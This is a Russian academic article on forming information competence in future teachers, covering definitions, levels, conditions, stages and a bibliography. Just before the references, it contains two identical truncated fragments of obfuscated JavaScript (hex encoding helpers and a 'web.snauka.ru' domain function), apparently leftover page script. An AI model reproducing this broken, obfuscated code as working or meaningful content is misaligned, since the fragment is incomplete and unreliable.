Актуальность темы данной статьи связана с веком бурного увеличения объёма информации. Нынешняя эпоха привела к стадии, названной современными учёными как «информационный взрыв», «информационный бум» и стала причиной более высоких требований к подготовке будущих профессионалов, которые должны уметь отбирать соответствующий материал из всего потока информации, использовать современные информационные технологии, непрерывно пополнять свой интеллектуальный багаж умений, знаний и навыков.
Вследствие этого перед преподавателями высших учебных заведений стоит миссия по формированию необходимых компетентностей, которые требуются в первую очередь. Так, в законах РФ «Об образовании» большое внимание уделяется как раз вопросам информатизации. ФГОС поставил задачу перед ВУЗами подготовить студента как непосредственного субъекта педагогического процесса, умеющего составлять свой план профессиональных действий, с учётом информатизации образовательной деятельности. Так же в образовательном стандарте говорится о том, что педагог должен следить за новыми успехами в методике обучения, в такой же мере уделяется внимание и использованию информационных технологий в условиях учебного процесса.
С.И. Ожегов термин компетентный определяет, как «знающий, осведомлённый в какой-то области специалист». При обращении к вопросу компетентностного аспекта следует развести понятия: «компетенция», «компетентность».
Большинство педагогов различая эти понятия, считают, что опыт, знания и умения выражают компетентность того или иного человека, а умение мобилизовать их определяет компетенцию профессиональной, образованной личности.
Другие же считают, что компетентность это категория оценки, характеризующая человека как субъекта деятельности, который способен выполнять и планировать результативные действия, приводящие к достижению цели. В составе компетентности выделяют пять компонентов: основательное понимание сущности поставленных проблем и задач; опыт и запас знаний, которые накоплены в этой области деятельности; умение подбирать эффективные способы и средства деятельности; чувство ответственности за итоги своей работы в ходе достижения цели; освоение передовых навыков.
Информационная компетентность педагога – это необходимое звено профессиональной компетентности, неотъемлемая часть образовательного процесса, качественное определение информационного подхода научной деятельности. Информационная компетентность выражается в умении технически мыслить и предполагает наличие прогностических, аналитических, рефлексивных, проективных умений в применении и овладении информации. Кроме этого, информационная компетентность – это часть технологической, информационной культуры педагога, она реализовывает интегративные задачи, служит связующим элементом специальных и общепедагогических умений и знаний. Необходимо отметить, что в сегодняшнем толковании под информационной компетентностью понимают применение информационных компьютерных технологий, а более точно данное определение следует толковать как «информационная компьютерная компетентность».
Информационная компетентность педагога формируется на стадии изучения компьютера, использования информационных технологий как средство обучения в ходе профессиональной деятельности и расценивается в качестве границы профессиональной деятельности. Исследование деятельности педагога позволяет выдвинуть нижеуказанные уровни становления информационной компетентности:
- уровень использования информации;
- уровень пользования компьютером;
- уровень целенаправленной деятельности и знания функции оборудования;
- уровень специфических заданий на основе межпредметного, творческого подхода.
Основными условиями, по мнению некоторых педагогов, которые влияют на формирование информационной компетентности, являются:
1) создание специальных задач, педагогических условий на уроке, которые стимулируют процесс формирования информационной компетентности;
2) обучение с помощью Интернет-ресурсов, средств мультимедиа, наглядных материалов, которые создают мотив для изучения информационных технологий;
3) проведение творческих проектов, исследовательских работ с применением информационных технологий.
Информационная компетентность педагога предусматривает полное применение обучающих программ, компьютерной техники, учебной литературы в электронном виде. Педагог должен иметь необходимую подготовку для соответствующей дифференциации потенциала учеников в группе, учитывая при этом их психологические и возрастные особенности, мотивации и индивидуальные особенности.
На основе вышесказанного можно выделить несколько особенностей, которые необходимо учитывать при реализации и разработке учебных программ в ВУЗах, порядка повышения квалификации, которые способствуют формированию информационной компетентности. Этими особенностями являются:
- большое количество лабораторных и практических занятий с применением компьютерной техники и создание самостоятельной деятельности студентов;
- изучение студентами на первых порах методики преподавания методических и педагогических дисциплин, связанных с применение информационных технологий в образовательной деятельности;
- выявление характерных признаков специализации педагогов в плане дисциплин, которые связаны с формированием информационной компетентности;
- освоение студентами методики применения компьютерных технологий на разных этапах урока.
Следует обратить внимание на три этапа формирования информационной компетентности:
- На начальном этапе подготовки студентов в ВУЗе формируется базовый уровень. В условиях общепринятых дисциплин формируются навыки, знания и умения, приобретаемые в ходе обучения.
- На следующем этапе осуществляется прогресс в информационной компетентности. На данном этапе студент способен выполнить педагогическую деятельность с использованием компьютерной техники. Вследствие этого в учебном плане вводятся такие дисциплины, которые способствуют широкому использованию информационных технологий в своей области. Все дисциплины должны иметь практическую сторону.
- Последним этапом является развитие информационной компетентности будущих педагогов, происходящее в последующем в их профессиональной работе с использованием информационных технологий.
Таким образом, весь процесс становления профессиональной педагогической информационной компетентности студента можно изобразить в виде следующей схемы:
Рисунок 1. Этапы формирования информационной компетентности
Именно такой аспект процесса формирования профессиональной информационной компетентности наиболее соответствует новой тенденции практической работы педагога профессионального образования.
Формирование информационной компетентности – это важное связующее звено его профессионализма. Целостное, направленное, системное понятие об информационной компетентности, выделение ее структуры, обоснование уровней, критериев и функций её целостности, помогает эффективно и результативно организовать учебную деятельность в условиях образовательного процесса, улучшить уровень предметных знаний, принимать плодотворные решения в работе, системно и качественно развивать учащегося.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=”",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “web.snauka.ru”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=”",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “web.snauka.ru”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e
Библиографический список
- Адольф В.А. Формирование профессиональной компетентности будущего учителя // Педагогика. – 2006. – № 10. – С. 17 – 26.
- Андропова Е.В. Педагогические условия оптимизации профессиональной подготовки будущего учителя на основе применения информационно-педагогических технологий в планировании учебного процесса: автореф. дисс. … канд. пед. наук. М., 2003. 26 с.
- Белкин А.С. Педагогическая компетентность. – Екатеринбург.: Издательский отдел УрГПУ, 2003.
- Беспалов П.В. «Компьютерная компетентность в контексте личностно-ориентированного обучения» // Педагогика.– 2003. – № 4. – С. 45 – 50.
- Варфоломеева Т.Н., Иванова Е.В. Формирование компетенций учащихся старших классов в процессе их обучение информатике // Инструменты и механизмы современного инновационного развития: сборник статей Международной научно – практической конференции (25 марта 2016 г., г. Томск). В 3 ч. Ч.2 / – Уфа: АЭТЕРНА, 2016. – 320 с.
- Варфоломеева, Т.Н. Информационная образовательная среда как основа повышения конкурентоспособности выпускников ВУЗА [Текст] / Т.Н. Варфоломеева, И.Н. Мовчан // Разработка инновационных механизмов повышения конкурентоспособности выпускников ИТ-специальностей вуза в условиях монопромышленного города: сб. науч. ст. Магнитогорск, 2012. – С. 100-105.
- Варфоломеева, Т.Н. Пути повышения эффективности трудоустройства выпускников IT-специальностей ВУЗа в условиях монопромышленного города [Текст] / Т.Н. Варфоломеева, И.Ю. Ефимова // Разработка инновационных механизмов повышения конкурентоспособности выпускников ИТ-специальностей вуза в условиях монопромышленного города: сб. науч. ст. Магнитогорск, 2012. – С. 23-32.
- Гиляжева, Г.З. Применение информационно-коммуникационных технологий для профессионального самоопределения учащихся старших классов [Текст] / Гиляжева Г.З., Варфоломеева Т.Н. // Новые информационные технологии в образовании материалы VIII Международной научно-практической конференции. Российский государственный профессионально-педагогический университет: сб. трудов конф. Екатеринбург, 2015. – С. 306-311.
- Ефимова, И.Ю. Методика и технологии преподавания информатики в учебных заведениях профессионального образования [Текст]: учебно-метод. пособие 2-е издание, стереотипное / И.Ю. Ефимова, Т.Н. Варфоломеева. – Москва: ООО «Флинта», 2014. – 41 с. ISBN 978-5-9765-2040-0
- Ефимова, И.Ю. Организационно-педагогические условия формирования информационной культуры учащихся в учреждениях дополнительного образования по профилю «Информатика» [Текст] : дис. …канд. пед. наук: 13.00.08 / И.Ю. Ефимова. – Магнитогорск, 2003.
- Зеер Э.Ф. Профессиография инженера педагога / Э. Ф. Зеер, Н. С. Глуханюк. – Свердловск, 1989.
- Крутова Е.В. Формирование базового уровня информационной компетентности учителя математики: автореф. дисс. … канд. пед. наук. М., 2008. 24 с.
- Кузьминов Я.И. Профессиональный стандарт педагогической деятельности (проект) // Вестник образования.– 2007. – № 7. – С. 17 – 24.
- Магомедов Ш.А. Системный подход в конструировании содержания подготовки будущего педагога профессионального обучения: на примере специализации «Информатизации образования»: автореф. дисс. … канд. пед. наук. М., 2008. 24 с.
- Муртузалиев А.С. Условия оптимизации алгоритмической подготовки будущего педагога профессионального обучения: автореф. дисс. … канд. пед. наук. Махачкала, 2011. 25с.
- Предеина О.С., Варфоломеева Т.Н. Выявление наиболее значимых общепрофессиональных и общекультурных компетенций в профессиональной деятельности бакалавров педагогического образования с двумя профилями (информатика и экономика) // Гуманитарные научные исследования. 2016. № 5 [Электронный ресурс]. URL: http://human.snauka.ru/2016/05/15013 (дата обращения: 30.05.2016).
- Сахнова, Т.Н. Педагогические условия формирования профессионального информационного мышления студентов университета [Текст] : дис. …канд. пед. наук: 13.00.08 / Т.Н. Сахнова. – Магнитогорск, 2003.
- Чусавитина, Г.Н. Подготовка специалистов по направлению «педагогическое образование» на факультете информатики ФГБОУ ВПО «Магнитогорский государственный университет» [Текст] / Г.Н. Чусавитина, Т.Н. Варфоломеева // Разработка инновационных механизмов повышения конкурентоспособности выпускников ИТ-специальностей вуза в условиях моно промышленного города: сб. науч. ст. Магнитогорск, 2012. – С. 126-131.